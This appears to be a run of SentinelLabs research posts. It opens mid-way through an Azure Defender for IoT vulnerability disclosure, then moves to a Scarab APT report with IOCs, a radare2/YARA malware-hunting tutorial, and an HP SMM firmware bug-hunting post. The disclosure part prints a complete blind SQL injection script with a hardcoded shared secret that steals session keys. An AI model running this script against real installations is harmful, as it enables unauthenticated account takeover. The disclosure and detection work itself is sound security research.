This attack is made easy due to the lack of session validation. There is no further layer of validation, such as verifying that the session id is used from the same IP address and User-Agent as the initiator of the session.

CVE-2021-42311

The UpdateHandshakeHandlers::is_connected function is also prone to SQL injection.

The class UpdateHandshakeHandler inherits from BaseHandler, which is accessible for unauthenticated users and can be reached via the API: /api/v1/token/update-handshake.

However, this time there is a twist: the _post function does token verification.

class UpdateHandshakeHandlers(BaseHandler):
    def __init__(self):
        super(UpdateHandshakeHandlers, self).__init__()
        self.update_secret = update_secret
 
    def is_connected(self, sensor_uid):
        with MySQLClient("127.0.0.1", mysql_user, mysql_password, "management") as client:
            logger.info("fetching the sensor version from db")
            xsenses = client.execute_select_query(
                "SELECT id, UID FROM xsenses WHERE UID = '{}'".format(sensor_uid))
 
            if len(xsenses) > 0:
                logger.info("sensor {} found on db".format(sensor_uid))
                return True
            else:
                logger.info("sensor {} not in db".format(sensor_uid))
                return False
 
    def _post(self):
        try:
            body = self.parse_body()
        except Exception as ex:
            return self.generic_handler(self.invalid_body)
 
        try:
            sensor_update_secret = body['update_secret']
            sensor_uid = body['xsenseUID']
 
            if sensor_update_secret != self.update_secret:
                raise Exception('invalid secret')
 
            if not self.is_connected(sensor_uid):
                raise Exception('only supported with connected sensors')
        except Exception as ex:
            logging.exception('failed to fetch new token')
            return self.generic_handler(self.invalid_token)
 
        logger.info("update handshake succeeded")
        token = {
            'token': tokens.get_token()
        }
        return token

This means the API requires a secret token, and without it we cannot exploit this SQL injection vulnerability. Fortunately, this API token is not that secretive. This update.token is hardcoded in the file index.properties and is shared across all Defender For IoT installations worldwide, which means that an attacker may exploit this vulnerability without any authentication.

We created the following script to extract a logged in user session id from the database, which allows us to take over the account.

import requests
import datetime
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
HOST = "https://10.100.102.253"
 
def startAttack():
    sessionKey = ""
    for currChr in range(1, 40):
        bitStr = ""
        for currBit in range(0, 8):
            sql = "aleg' union select if(ord(substr((SELECT session_key from django_session WHERE LENGTH(session_data) > 70 ORDER BY expire_date DESC LIMIT 1),{0},1)) >>{1} & 1 = 1 ,sleep(3),0),2 -- a".format(currChr, currBit)
 
            body = {
                "update_secret": "93960370-2f5f-4be1-813e-b7a3768ad288",
                "xsenseUID": sql
            }
 
            now = datetime.datetime.now()
            res = requests.post(HOST + "/api/v1/token/update-handshake", json=body, verify=False)
            if (datetime.datetime.now() - now).seconds > 2:
                bitStr += "1"
                print(1)
            else:
                bitStr += "0"
                print(0)
 
        final = bitStr[::-1]
        print(final)
        print(int(final, 2))
        chrNum = int(final, 2)
 
        if not chrNum:
            return
            
        sessionKey += chr(chrNum)
        print("SessionKey: " + sessionKey)
 
            
 
def main():
    startAttack()
 
if __name__ == "__main__":
    main()

As with the first SQL injection vulnerability, after extracting the session id from the database, we can use any of the methods mentioned above to execute code as root.

CVE-2021-37222

The sensor machine uses RCDCAP (an open source project) to open CISCO ERSPAN and HP ERM encapsulated packets.

The functions ERSPANProcessor::processImpl and HPERMProcessor::processImpl methods are vulnerable to a wildcopy heap based buffer overflow vulnerability, which can potentially allow arbitrary code execution, when processing specially crafted input.

These functions are vulnerable to a wildcopy heap based buffer overflow vulnerability, which can potentially allow arbitrary code execution.

This vulnerability was found by locally fuzzing RCDCAP with pcap files and occurs when this line is executed:

(hp-erm-processor.cc:94)
(erspan-processor.cc:90)

std::copy(&packet[offset + MACHeader802_1Q::getVLANTagOffset()],
        &packet[caplen], &packet[MACHeader802_1Q::getVLANTagOffset()+MACHeader802_1Q::getVLANTagSize()]);

This was reported to the code owner and MSRC; the code owner has already issued a fix:

MSRC, however, decided that this vulnerability does not meet the bar for a MSRC security update and the development group might decide to fix it as needed.

Impact

  • Who is affected? Azure Defender for IoT running with unpatched systems are affected. Since this product has many configurations, for example RTOS, which have not been tested, users of these systems can be affected as well.
  • What is the risk? Successful attack may lead to full network compromise, since Azure Defender For IoT is configured to have a TAP (Terminal Access Point) on the network traffic. Access to sensitive information on the network could open a number of sophisticated attacking scenarios that could be difficult or impossible to detect.

Mitigation

We responsibly disclosed our findings to MSRC in June 2021, and Microsoft has released a security advisory with patch details December 2021, which can be found here, here, here, here and here.

While we have no evidence of in-the-wild exploitation of these vulnerabilities, we further recommend revoking any privileged credentials deployed to the platform before the cloud platforms have been patched, and checking access logs for irregularities.

Conclusion

Cloud providers heavily invest in securing their platforms, but unknown zero-day vulnerabilities are inevitable and put customers at risk. It’s particularly concerning when it comes to IoT and OT devices that have little to no defenses and depend entirely on these vulnerable platforms for their security posture. Cloud users should take a defense-in-depth approach to cloud security to ensure breaches are detected and contained, whether the threat comes from the outside or from the platform itself.

As part of SentinelLabs’ commitment to advancing public security, we actively invest in research, including advanced threat modeling and vulnerability testing of cloud platforms and related technologies and widely share our findings in the interest of protecting all users.

Disclosure Timeline

  • June 21, 2021 – Initial report to MSRC.
  • June 24, 2021 – Initial response from MSRC
  • June 30, 2021 – MSRC requests a PoC video and code.
  • July 1, 2021 – We shared the code and a PoC video with MSRC.
  • July 16, 2021 – MSRC confirmed the bug and started working on a fix.
  • December 14, 2021 – MSRC released an advisory.

✇SentinelLabs

Chinese Threat Actor Scarab Targeting Ukraine

By: Tom Hegel

Executive Summary

  • Ukraine CERT (CERT-UA) has released new details on UAC-0026, which SentinelLabs confirms is associated with the suspected Chinese threat actor known as Scarab.
  • The malicious activity represents one of the first public examples of a Chinese threat actor targeting Ukraine since the invasion began.
  • Scarab has conducted a number of campaigns over the years, making use of a custom backdoor originally known as Scieron, which may be the predecessor to HeaderTip.
  • While technical specifics vary between campaigns, the actor generally makes use of phishing emails containing lure documents relevant to the target, ultimately leading to the deployment of HeaderTip.

UAC-0026

On March 22nd 2022, CERT-UA published alert #4244, where they shared a quick summary and indicators associated with a recent intrusion attempt from an actor they dubbed UAC-0026. In the alert, CERT-UA noted the delivery of a RAR file archive "Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar", which translates to “On the preservation of video recordings of criminal actions of the army of the Russian Federation.rar”. Additionally, they note the archive contains an executable file, which opens a lure document, and drops the DLL file "officecleaner.dat" and a batch file "officecleaner". CERT-UA has named the malicious DLL ‘HeaderTip’ and notes similar activity was recorded in September 2020.

The UAC-0026 activity is the first public example of a Chinese threat actor targeting Ukraine since the invasion began. While there has been a marked increase in publicly reported attacks against Ukraine over the last week or so, these and all prior attacks have otherwise originated from Russian-backed threat actors.

Rough timeline of recent Ukrainian conflict cyber activity

Connection of HeaderTip to Scarab APT

Scarab has a relatively long history of activity based on open source intelligence. The group was first identified in 2015, while the associated IOCs are archived on OTX. As noted in the previous research, Scarab has operated since at least 2012, targeting a small number of individuals across the world, including Russia, United States, and others. The backdoor deployed by Scarab in their campaigns is most commonly known as Scieron.

During our review of the infrastructure and HeaderTip malware samples shared by CERT-UA, we identified relations between UAC-0026 and Scarab APT.

We assess with high confidence the recent CERT-UA activity attributed to UAC-0026 is the Scarab APT group. An initial link can be made through the design of the malware samples and their associated loaders from at least 2020. Further relationships can be identified through the reuse of actor-unique infrastructure between the malware families associated with the groups:

  • 508d106ea0a71f2fd360fda518e1e533e7e584ed (HeaderTip – 2021)
  • 121ea06f391d6b792b3e697191d69dc500436604 (Scieron 2018)
  • Dynamic.ddns[.]mobi (Reused C2 Server)

As noted in the 2015 reporting on Scarab, there are various indications the threat actor is Chinese speaking. Based on known targets since 2020, including those against Ukraine in March 2022, in addition to specific language use, we assess with moderate confidence that Scarab is Chinese speaking and operating under geopolitical intelligence collection purposes.

Lure Documents

Analysis of lure documents used for initial compromise can provide insight into those being targeted and particular characteristics of their creator. For instance, in a September 2020 campaign targeting suspected Philippines individuals, Scarab made use of lure documents titled “OSCE-wide Counter-Terrorism Conference 2020”. For context, OSCE is the Organization for Security and Co-operation in Europe.

September 2020 Scarab APT Lure Document Content

More recently, industry colleagues have noted a case in which Scarab was involved in a campaign targeting European diplomatic organizations during the US withdrawal from Afghanistan.

The lure document reported by CERT-UA mimics the National Police of Ukraine, themed around the need to preserve video materials of crimes conducted by the Russian military.

Ukraine Targeting Lure Document

Lure documents through the various campaigns contain metadata indicating the original creator is using the Windows operating system in a Chinese language setting. This includes the system’s username set as “用户” (user).

Malware and Infrastructure

Multiple methods have been in use to attempt to load the malware onto the target system. In the case of the 2020 documents, the user must enable document Macros. In the most recent version from CERT-UA, the executable loader controls the install with the help of a batch file while also opening the lure document. The loader executable itself contains the PDF, batch installer, and HeaderTip malware as resource data.

The batch file follows a simple set of instructions to define the HeaderTip DLL, set persistence under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and then execute HeaderTip. Exports called across the HeaderTip samples have been HttpsInit and OAService, as shown here.

officecleaner.bat File Contents

The HeaderTip samples are 32-bit DLL files, written in C++, and roughly 9.7 KB. The malware itself will make HTTP POST requests to the defined C2 server using the user agent: "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko". General functionality of HeaderTip is rather limited to beaconing outbound for updates, potentially so it can act as a simple first stage malware waiting for a second stage with more capabilities.

Scarab has repeatedly made use of dynamic DNS services, which means C2 server IP, and subdomains should not be considered related. In fact, some of the dynamic DNS services used by Scarab can easily link one to various unrelated APT groups, such as the infamous CloudHopper report or 2015 bookworm malware blogs. While those may be associated with Chinese APTs, it may indicate more of a standard operating toolkit and approach rather than shared technical resources.

Conclusion

We assess with high confidence the recent CERT-UA activity attributed to UAC-0026 is the Scarab APT group and represents the first publicly-reported attack on Ukraine from a non-Russian APT. The HeaderTip malware and associated phishing campaign utilizing Macro-enabled documents appears to be a first-stage infection attempt. At this point in time, the threat actor’s further objectives and motivations remain unclear.

Indicators of Compromise

IOC Description
product2020.mrbasic[.]com March 2022 C2 Server
8cfad6d23b79f56fb7535a562a106f6d187f84cf March 2022 Ukraine file delivery archive “Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar”
e7ef3b033c34f2ac2772c15ad53aa28599f93a51 March 2022 Loader Executable “officecleaner.dat”
fdb8de6f8d5f8ca6e52ce924a72b5c50ce6e5d6a March 2022 Ukraine lure document “#2163_02_33-2022.pdf”
4c396041b3c8a8f5dd9db31d0f2051e23802dcd0 March 2022 Ukraine batch file “officecleaner.bat”
3552c184281abcc14e3b941841b698cfb0ec9f1d March 2022 Ukraine HeaderTip sample “httpshelper.dll”
ebook.port25[.]biz September 2020 C2 Server
fde012fbcc65f4ab84d5f7d4799942c3f8792cc3 September 2020 file delivery archive “Joining Instructions IMPC 1.20 .rar”
e30a24e7367c4a82d283c7c68cff5739319aace9 September 2020 lure document “Joining Instructions IMPC 1.20 .xls”
5cc8ce82fc21add608277384dfaa8139efe8bea5 September 2020 HeaderTip samples based on C2 use
mert.my03[.]com September 2020 C2 Server
90c4223887f10f8f9c4ac61f858548d154183d9a September 2020 file delivery archive “OSCE-wide Counter-Terrorism Conference 2020.zip”
82f8c69a48fa1fa23ff37a0b0dc23a06a7cb6758 September 2020 lure document “OSCE-wide Counter-Terrorism Conference 2020”
b330cf088ba8c75d297d4b65bdbdd8bee9a8385c September 2020 HeaderTip sample”officecleaner.dll”
83c4a02e2d627b40c6e58bf82197e113603c4f87 HeaderTip (Possible researcher)
508d106ea0a71f2fd360fda518e1e533e7e584ed HeaderTip
dynamic.ddns[.]mobi C2 Server, overlaps with Scieron (b5f2cc8e8580a44a6aefc08f9776516a)

✇SentinelLabs

The Art and Science of macOS Malware Hunting with radare2 | Leveraging Xrefs, YARA and Zignatures

By: Phil Stokes

Welcome back to our series on macOS reversing. Last time out, we took a look at challenges around string decryption, following on from our earlier posts about beating malware anti-analysis techniques and rapid triage of Mac malware with radare2. In this fourth post in the series, we tackle several related challenges that every malware hunter faces: you have a sample, you know it’s malicious, but

  • How do you determine if it’s a variant of other known malware?
  • If it is unknown, how do you hunt for other samples like it?
  • How do you write robust detection rules that survive malware author’s refactoring and recompilation?

The answer to those challenges is part Art and part Science: a mixture of practice, intuition and occasionally luck(!) blended with a solid understanding of the tools at your disposal. In this post, we’ll get into the tools and techniques, offer you tips to guide your practice, and encourage you to gain experience (which, in turn, will help you make your own luck) through a series of related examples.

As always, you’re going to need a few things to follow along, with the second and third items in this list installed in the first.

  1. An isolated VM – see instructions here for how to get set up
  2. Some samples – see Samples Used below
  3. Latest version of r2 – see the github repo here.

What are Zignatures and Why Are They Useful?

By now you might have wondered more than once if this post just had a really obvious typo: Zignatures, not signatures? No, you read that right the first time! Zignatures are r2’s own format for creating and matching function signatures. We can use them to see if a sample contains a function or functions that are similar to other functions we found in other malware. Similarly, Zignatures can help analysts identify commonly re-used library code, encryption algorithms and deobfuscation routines, saving us lots of reversing time down the road (for readers familiar with IDA Pro or Ghidra, think F.L.I.R.T or Function ID).

What’s particularly nice about Zignatures is that you can not only search for exact matches but also for matches with a certain similarity score. This allows us to find functions that have been modified from one instantiation to the other but which are otherwise the same.

Zignatures can help us to answer the question of whether an unknown sample is a variant of a known one. Once you are familiar with Zignatures, they can also help you write good detection rules, since they will allow you to see what is constant in a family of malware and what is variant. Combined with YARA rules, which we’ll take a look at later in this post, you can create effective hunting rules for malware repositories like VirusTotal to find variants or use them to help inform the detection logic in malware hunting software.

Create and Use A Zignature

Let’s jump into some malware and create our first Zignature. Here’s a recent sample of WizardUpdate (you might remember we looked at an older sample of WizardUpdate in our post on string decryption).

Loading the sample into r2, analyzing its functions, and displaying its hashes

We’ve loaded the sample into r2 and run some analysis on it. We’ve been conveniently dropped at the main() function, which looks like this.

WizardUpdate main() function

That main function contains some malware specific strings, so should make a nice target for a Zignature. To do so, we use the zaf command, supplying the parameters of the function name and the signature name. Our sample file happened to be called “WizardUpdateB1”, so we’ll call this signature “WizardUpdateB1_main”. In r2, the full command we need, then, is:

> zaf main WizardUpdate_main

We can look at the newly-created Zignature in JSON format with zj~{} (if you’re not sure why we’re using the tilde, review the earlier post on grepping in r2).

An r2 Zignature viewed in JSON format

To see that the Zignature works, try zb and note the output:

zb returns how close the match was to the Zignature and the function at the current address

The first entry in the row is the most important, as that gives us the overall (i.e., average) match (between 0.00000 and 1.00000). The next two show us the match for bytes and graph, respectively. In this case, it’s a perfect match to the function, which is of course what we would expect as this is the sample from which we created the rule.

You can also create Zignatures for every function in the binary in one go with zg.

Create function signatures for every function in a binary with one command

Beware of using zg on large files with thousands of functions though, as you might get a lot of errors or junk output. For small-ish binaries with up to a couple of hundred functions it’s probably fine, but for anything larger than that I typically go for a targeted approach.

So far, we have created and tested a Zignature, but it’s real value lies in when we use the Zignature on other samples.

Create A Reusable and Extensible Zignatures File

At the moment, your Zignatures aren’t much use because we haven’t learned yet how to save and load Zignatures between samples. We’ll do that now.

We can save our generated Zignatures with zos <filename>. Note that if you just provide the bare filename it’ll save in the current working directory. If you give an absolute path to an existing file, r2 will nicely merge the Zignatures you’re saving with any existing ones in that file.

Radare2 does have a default address from which it is supposed to autoload Zignatures if the autoload variable is set, namely ~/.local/share/radare2/zigns/ (in some documentation, it’s ~/.config/radare2/zigns/) However, I’ve never quite been able to get autoload to work from either address, but if you want to try it, create the above location and in your radare2 config file (~/.radare2rc) add the following line.

e zign.autoload = true

In my case, I load my zigs file manually, which is a simple command: zo <filename> to load, and zb to run the Zignatures contained in the file against the function at the current address.

Sample WizardUpdate_B2’s main function doesn’t match our Zignature

Sample WizardUpdate_B5’s main function is a perfect match for our Zignature

As you can see, the Sample above B5 is a perfect match to B1, whereas B2 is way off with the match only around 46.6%.

When you’ve built up a collection of Zignatures, they can be really useful for checking a new sample against known families. I encourage you to create Zignatures for all your samples as they will pay dividends down the line. Don’t forget to back them up too. I learned the hard way that not having a master copy of my Zigs outside of my VMs can cause a few tears!

Creating YARA Rules Within radare2

Zignatures will help you in your efforts to determine if some new malware belongs to a family you’ve come across before, but that’s only half the battle when we come across a new sample. We also want to hunt – and detect – files that are like it. For that, YARA is our friend, and r2 handily integrates the creation of YARA strings to make this easy.

In this next example, we can see that a different WizardUpdate sample doesn’t match our earlier Zignature.

The output from zb shows that the current function doesn’t match any of our previous function signatures

While we certainly want to add a function signature for this sample’s main() to our existing Zigs, we also want to hunt for this on external repos like VirusTotal and elsewhere where YARA can be used.

Our main friend here is the pcy command. Since we’ve already been dropped at main()’s address, we can just run the pcy command directly to create a YARA string for the function.

Generating a YARA string for the current function

However, this is far too specific to be useful. Fortunately, the pcy command can be tailored to give us however many bytes we wish at whatever address.

We know that WizardUpdate makes plenty of use of ioreg, so let’s start by searching for instances of that in the binary.

Searching for the string “ioreg” in a WizardUpdate sample

Lots of hits. Let’s take a closer look at the hex of the first one.

A URL embedded in the WizardUpdate sample

That URL address might be a good candidate to include in a YARA rule, let’s try it. To grab it as YARA code, we just seek to the address and state how many bytes we want.

Generating a YARA string of 48 bytes from a specific address

This works nicely and we can just copy and paste the code into VT’s search with the content modifier. Our first effort, though, only gives us 1 hit on VirusTotal, although at least it’s different from our initial sample (we’ll add that to our collection, thanks!).

Our string only found a single hit on VirusTotal

But note how we can iterate on this process, easily generating YARA strings that we can use both for inclusion and exclusion in our YARA rules.


This time we had better success with 46 hits for one string

This string gives us lots of hits, so let’s create a file and add the string.

pcy 32 >> WizardUpdate_B.yara
Outputting the YARA string to a file

From here on in, we can continue to append further strings that we might want to include or exclude in our final YARA rule. When we are finished, all we have to do is open our new .yara file and add the YARA meta data and conditional logic, or we can paste the contents of our file into VTs Livehunt template and test out our rule there.

Xrefs For the Win

At the beginning of this post I said that the answer to some of the challenges we would deal with today were “part Art and part Science”. We’ve done plenty of “the Science”, so I want to round out the post by talking a little about “the Art”. Let’s return to a topic we covered briefly earlier in this series – finding cross-references in r2 – and introduce a couple of handy tips that can make development of hunting rules a little easier.

When developing a hunting or detection rule for a malware family, we are trying to balance two opposing demands: we want our rule to be specific enough not to create false positives, but wide or general enough not to miss true positives. If we had perfect knowledge of all samples that ever had been or ever would be created for the family under consideration, that would be no problem at all, but that’s precisely the knowledge-gap that our rule is aiming to fill.

A common tip for writing YARA rules is to use something like a combination of strings, method names and imports to try to achieve this balance. That’s good advice, but sometimes malware is packed to have virtually none of these, or not enough to make them easily distinguishable. On top of that, malware authors can and do easily refactor such artifacts and that can make your rules date very quickly.

A supplementary approach that I often use is to focus on code logic that is less easy for author’s to change and more likely to be re-used.

Let’s take a look at this sample of Adload written in Go. It’s a variant of a much more prolific version, also written in Google’s Golang. Both versions contain calls to a legit project found on Github, but this variant is missing one of the distinctive strings that made its more widespread cousin fairly easy to hunt.

A version of Adload that calls out to a popular project on Github

However, notice the URL at 0x7226. That could be interesting, but if we hit on that domain name string alone in VirusTotal we only see 3 hits, so that’s way too tight for our rule.

Your rules won’t catch much if your strings are too specific
Let’s grab some bytes immediately after the C2 string is loaded

We might do better if we try grabbing bytes of code right after that string has been loaded, for while the API string will certainly change, the code that consumes it perhaps might not. In this case, searching on 96 bytes from 0x7255 catches a more respectable 23 hits, but that still seems too low for a malware variant that has been circulating for many months.

Notice the dates – this malware has probably far more than just 23 samples

Let’s see if we can do better. One trick I find useful with r2 is to hunt down all the XREFs to a particular piece of code and then look at the calling functions for useful sequences of byte code to hunt on.

For example, you can use sf. to seek to the beginning of a function from a given address (assuming it’s part of a function, of course) and then use axg to get the path of execution to that function all the way from main(). You can use pds to give you a summary of the calls in any function along the way, which means combining axg and pds is a very good way to quickly move around a binary in r2 to find things of interest.

Using the axg command to trace execution path back to main

Now that we can see the call graph to the C2 string, we can start hunting for logic that is more likely to be re-used across samples. In this case, let’s hunt for bytes where sym.main.main calls the function that loads the C2 URL at 0x01247a41.

Finding reusable logic that should be more general than individual strings

Grabbing 48 bytes from that address and hunting for it on VT gives us a much more respectable 45 TP hits. We can also see from VT that these files all have a common size, 5.33MB, which we can use as a further pivot for hunting.

Our hunt is starting to give better results, but don’t stop here!

We’ve made a huge improvement on our initial hits of 3 and then 23, but we’re not really done yet. If we keep iterating on this process, looking for reusable code rather than just specific strings, imports or method names, we’re likely to do much better, and by now you should have a solid understanding of how to do that using r2 to help you in your quest. All you need now, just like any good piece of malware, is a bit of persistence!

Conclusion

In this post, we’ve taken a look at some of r2’s lesser known features that are extremely useful for hunting malware families, both in terms of associating new samples to known families and in searching for unknown relations to a sample or samples we already have. If you haven’t checked out the previous posts in this series, have a look at Part 1, Part 2 and Part 3. If you would like us to cover other topics on r2 and reverse engineering macOS malware, ping me or SentinelLabs on Twitter with your suggestions.

Samples Used

File name SHA1
WizardUpdate_B1 2f70787faafef2efb3cafca1c309c02c02a5969b
WizardUpdate_B2 dfff3527b68b1c069ff956201ceb544d71c032b2
WizardUpdate_B3 814b320b49c4a2386809b0bdb6ea3712673ff32b
WizardUpdate_B4 6ca80bbf11ca33c55e12feb5a09f6d2417efafd5
WizardUpdate_B5 92b9bba886056bc6a8c3df9c0f6c687f5a774247
WizardUpdate_B6 21991b7b2d71ac731dd8a3e3f0dbd8c8b35f162c
WizardUpdate_B7 6e131dca4aa33a87e9274914dd605baa4f1fc69a
WizardUpdate_B8 dac9aa343a327228302be6741108b5279adcef17
Adload 279d5563f278f5aea54e84aa50ca355f54aac743

✇SentinelLabs

Another Brick in the Wall: Uncovering SMM Vulnerabilities in HP Firmware

By: Assaf Carlsbad

By Assaf Carlsbad & Itai Liba

Executive Summary

  • SentinelLabs has discovered 6 high severity flaws in HP’s UEFI firmware impacting HP laptops and desktops.
  • Attackers may exploit these vulnerabilities to locally escalate to SMM privileges.
  • SentinelLabs findings were proactively reported to HP on Aug 18, 2021, and are tracked as:
    • CVE-2022-23956, marked with a CVSS score of 8.2
    • CVE-2022-23953, marked with a CVSS score of 7.9
    • CVE-2022-23954, marked with a CVSS score of 7.9
    • CVE-2022-23955, marked with a CVSS score of 7.9
    • CVE-2022-23957, marked with a CVSS score of 7.9
    • CVE-2022-23958, marked with a CVSS score of 7.9
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.

Hello and welcome back to yet another post in our blog post series covering UEFI & SMM security. This is the 6th (!) entry in the series, and it’s a good spot to pause for a second and look back to better estimate the vast distance we covered: from the baby steps of merely dumping and peeking at UEFI firmware, through the development of emulation infrastructure for it, and up to the point where we learned how to proactively hunt for SMM vulnerabilities. This post will continue where we left last time and will further explore SMM vulnerabilities, albeit from a slightly different angle.

So far, the SMM bug hunting methodology we came up with is mostly manual and goes roughly as follows:

  1. Obtain a UEFI firmware image of interest, either by dumping it from the SPI flash or, when possible, downloading it directly from the vendor’s website.
  2. Extract the encapsulated SMM binaries via tools such as UEFITool or UEFIExtract.
  3. Open the SMM images one by one in IDA and analyze them using efiXplorer, while keeping a keen eye for vulnerable code patterns like the ones described in the previous part.

Needless to say, this process is extremely slow, inaccurate, and cumbersome. After doing it repetitively over and over again, we were so unsatisfied with it that we decided to take the intuition and rules-of-thumb we developed and codify them into the form of an automated tool. The outcome of this endeavor is an IDA-based vulnerability scanner for SMM binaries we named Brick. For the benefit of the firmware security community, we decided to publish it as an open-source project that is readily available on GitHub.

In this post, we’ll introduce readers to Brick, its internal architecture, and its bug-hunting capabilities. Afterward, we’ll present a case study where we demonstrate how Brick was used to discover 6 different vulnerabilities affecting the firmware of some HP laptops. By doing so, we hope to encourage more people in the community to contribute back to Brick, as well as to educate the readers about the potential strengths (and weaknesses) of automated vulnerability hunting.

Enjoy the read!

Automated SMM Vulnerability Hunting Using Brick

As we said, Brick was developed to pinpoint certain vulnerabilities and anti-patterns inside SMM binaries. To effectively pull this off, its execution lifecycle is split into three different phases: harvest phase, analysis phase, and summary phase. Following is a detailed description of each phase.

Figure 1 – Schematic overview of Brick’s execution lifecycle

Harvest Phase

In the vast majority of cases, it’s most useful to give Brick a complete UEFI firmware image to scan. Doing so allows the researcher to “squeeze” the most vulnerabilities out of it while also gaining a bird-eye view of the code quality of the firmware as a whole. Alas, a typical UEFI firmware image is a complex beast that contains much more than SMM binaries. Among other things, it usually includes other stuff such as

  • Non-SMM executable modules for the different boot phases (PEI/DXE/etc.)
  • Microcode updates for the target CPU to be applied during early boot
  • Various Authenticated Code Modules (ACMs) signed by Intel, such as Boot Guard and BIOS Guard
  • A store for NVRAM variables
  • And much more
Figure 2 – SMM binaries are by no means the only file type stored inside a firmware image

Because of that, our first task is to separate the wheat from the chaff. In Brick’s terminology, this is accomplished by the harvest phase. During this phase, Brick will parse the firmware image and extract out of it just the SMM binaries we’re interested in.

To invoke Brick and kickstart the harvest phase, just pass the full path of the firmware’s image to the Brick.py script:

Figure 3a – The harvest phase in action

Internally, the harvest phase is implemented by offloading most of the actual work to two external tools/libraries:

The reason we use two different solutions for this phase is that we encountered several cases where one of them struggled to properly parse a UEFI image, while the other succeeded without any hurdles. Thus, the strategy of using one of them and falling back to the other in case of failure gives us just the right amount of redundancy we need to successfully handle the vast majority of firmware images encountered in the wild.

At the end of the harvest phase — given that all went well — the output directory should contain several dozens of SMM binaries waiting for further examination.

Figure 3b – The output directory at the end of the harvest phase

Note that in addition to full UEFI firmware images, Brick also supports other input formats in case you want to limit bug hunting to a narrower scope. These include

  • A single executable file (e.g. foo.efi)
  • Directory that contains multiple SMM binaries
  • UEFI capsule update package
  • Various other options (see the source code for the complete list of supported options).

Analysis Phase

At this point, we have a directory filled with the SMM binaries we’re interested in analyzing. The rough idea was to open each SMM binary in IDA and — after the initial autoanalysis completes — run some custom IDAPython scripts on top of it to do the actual bug hunting. This must be done intelligently, as a naive solution for this problem would suffer from two severe downsides:

  1. Analyzing SMM binaries one at a time is not very efficient performance-wise. For this reason, we should strive at parallelizing the whole process while taking advantage of multiple CPU cores.
  2. IDA is mostly used in an interactive fashion, and while there exists a batch mode for non-interactive usage, it’s often overlooked as it’s not very convenient to use.

Luckily for us, it didn’t take us too long to bump into a project called idahunt that solves these exact two problems. Put in the author’s own words:

idahunt is a framework to analyze binaries with IDA Pro and hunt for things in IDA Pro. It is a command-line tool to analyze all executable files recursively from a given folder. It executes IDA in the background so you don’t have to manually open each file. It supports executing external IDA Python scripts.”

Figure 4 – Overview of using idahunt to speed up the scanning process

The IDAPython scripts executed by idahunt on behalf of Brick are known as Brick modules and come in three different flavors:

  • Processing modules, which are in charge of doing some initial preparatory work and handling some of the shenanigans of UEFI.
  • Hunting modules that employ a wide range of heuristics to pinpoint potential vulnerabilities. Usually, there exists a dedicated module for each of the vulnerability classes described earlier.
  • Informational modules emit valuable information about the target image that is not necessarily tied to vulnerabilities. This includes, for example, the list of unrecognized UEFI protocols consumed by the image.
Figure 5 – Overview of the various Brick modules

While developing these Brick modules, we found the raw IDAPython API to be a bit rough at times, so for the most part the modules were developed on top of a wrapper framework called Bip. One of the major highlights of this framework is that it also exposes wrapper functions for the Hex-Rays Decompiler API, which allows writing analysis routines in a fairly high-level notion.

Figure 6 – The analysis phase, running 8 concurrent IDA instances in the background

Summary Phase

After all SMM images in the input directory were scanned, Brick will move on to collect the output emitted by individual modules and merge them into a single, browsable HTML report.

Note that in addition to the scan’s verdict, the report file also includes links to some useful resources such as the annotated IDB file (necessary for validating the correctness of the results), the raw IDA log file (useful for troubleshooting and debugging), as well as a separate report file generated by efiXplorer.

Figure 7 – Portion of a Brick report produced for some firmware image

Case Study – Using Brick to Uncover HP Firmware Vulnerabilities

Throughout the past year, we were using Brick extensively to review various firmware images from almost all leading manufacturers in the industry. So far, this campaign is definitely paying off and has already given birth to no less than 13 different CVEs (see Appendix A). In this case study, we would like to put a spotlight on several such vulnerabilities found while auditing one particular firmware image from HP (version 01.04.01 Rev.A for HP ProBook 440 G8 Notebook). After Brick’s scan was completed, we opened the resulting report file and were faced with a rather intriguing entry:

Figure 8 – The SMM module 0155.efi does not validate certain nested pointers

This entry immediately drew our attention because, if confirmed correct, it means that the SMI handler installed by the SMM image 0155.efi does not validate certain pointers that are nested within its communication buffer. As we explained in the previous post, that in turn implies the handler can be exploited by attackers to corrupt or disclose the contents of SMRAM.

In this section, we’ll elaborate on how Brick managed to find such vulnerability in a completely automated fashion. For that, we’ll walk you through the internal workings of some Brick modules that were involved in making this verdict. Note that due to the medium of a written article, the case study will be presented using snapshots of the IDA database, before and after each module invocation. In reality, however, all modules will be executed automatically one after another, without any user interaction.

Preprocessor

The first Brick module that is called to handle any input file is called the preprocessor. The preprocessor sets up the ground for the next modules in the chain and takes care of the following:

  • Making the .text section read-write, which prevents the decompiler from performing some excessive optimizations.
  • Discovering functions that the initial auto-analysis missed (based on codatify).
  • Scraping the edk2 and edk2-platforms repositories for protocol header files and attempting to import them into the IDA database. The net result is that the database is filled with a plethora of UEFI protocol definitions:
Figure 9 – Some UEFI protocols that were imported from EDK2 by the preprocessor

efiXplorer

Right after the preprocessor, Brick moves on to load and run the efiXplorer plugin. As we mentioned countless times throughout the series, efiXplorer has tons of functionality and serves as the de-facto standard way of analyzing UEFI binaries with IDA. Among other things, it takes care of the following:

  • Locating and renaming known UEFI GUIDs
  • Locating and renaming calls to UEFI boot/runtime services
  • Applying correct types for interface pointers
Figure 10 – Pseudocode from a decompiled function before efiXplorer was invoked
Figure 11 – The same function, after efiXplorer analysis

Last but not least, efiXplorer is also capable of locating and renaming SMI handlers. In its recent editions, it prefixes all CommBuffer-based SMIs with SmiHandler’, and all legacy software SMIs with ‘SwSmiHandler’. As can be seen, in the case of 0155.efi, only one SMI handler seems to exist:

Figure 12 – the SMI handler found by efiXplorer

Postprocessor

Following efiXplorer, control is passed to the postprocessor. The postprocessor is a module that is in charge of completing the analysis performed earlier by efiXplorer. Among other things, this includes:

  • Locating SMI handlers that efiXplorer might have missed
  • Fixing the function prototype for some UEFI services such as GetVariable()/SetVariable()
  • Renaming function arguments

